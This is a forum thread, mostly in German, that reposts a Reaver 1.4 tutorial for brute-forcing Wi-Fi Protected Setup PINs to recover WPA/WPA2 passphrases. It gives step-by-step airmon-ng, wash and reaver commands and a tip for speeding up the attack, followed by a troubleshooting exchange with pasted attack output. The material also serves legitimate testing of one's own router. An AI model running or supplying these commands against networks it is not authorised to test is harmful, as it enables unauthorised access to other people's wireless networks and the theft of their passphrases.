Howto: Reaver 1.4 WPS Bruteforcing Tutorial

supreme

New member
#1
http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.htmlhttp://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html



Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

Then Start ./wash -i mon0 to scan for valid Wifis.

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
 
#2
toller copy-paste-job. Schön, dass keiner sich die Mühe macht drüber zu lesen. Das Tool zum Prüfen, ob ein AP über WPS angreifbar ist, schimpft sich walsh, und wash.
 
C

caffeine

Guest
#3
toller copy-paste-job. Schön, dass keiner sich die Mühe macht drüber zu lesen. Das Tool zum Prüfen, ob ein AP über WPS angreifbar ist, schimpft sich walsh, und wash.
Ich würde das Thema gerne noch einmal auffrischen :)

Die Nutzung von Wash und Reaver ist relativ simpel, aber ich bekomme jedes mal dieselbe Meldung, egal welche Einstellungen ich unternehme:

[+] Associated with [MAC] (ESSID: [ESSID])
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^C
[+] Nothing done, nothing to save.

Hat jemand ein ähnliches Problem gehabt und oder weiß was man dagegen tun kann ?

- Caffeine
 
C

caffeine

Guest
#5
Das kann nicht sein das Opfer bin ich, es ist demnach keine 3m von mir entfernt. Darüber hinaus weiß ich, dass WPS eingeschaltet ist und das wird auf Wash auch bestätigt.
 
#6
es geht auch nicht mit jeder wlan karte,und es gibt router die können sich vor reaver schützen,
wenn es dein router ist dann brauchst du wash nicht,wash liegt nicht immer richtig.
 
Zuletzt bearbeitet:
C

caffeine

Guest
#7
Hmm ja gut das kann natürlich sein, gibt es ne Möglichkeit da zu differenzieren ? Und was mich auch darüber hinaus generell stört, Wash gibt zwar immer an ob WPS locked ist, aber nicht, um welche WPS Möglichkeit es sich handelt. Ich meine vielleicht ist WPS-Lock Off aber, die Button-Push Variante aktiviert, quäl mich durch 8 Std Brute-Force ...

- vG Caffeine
 
Zuletzt bearbeitet:
Oben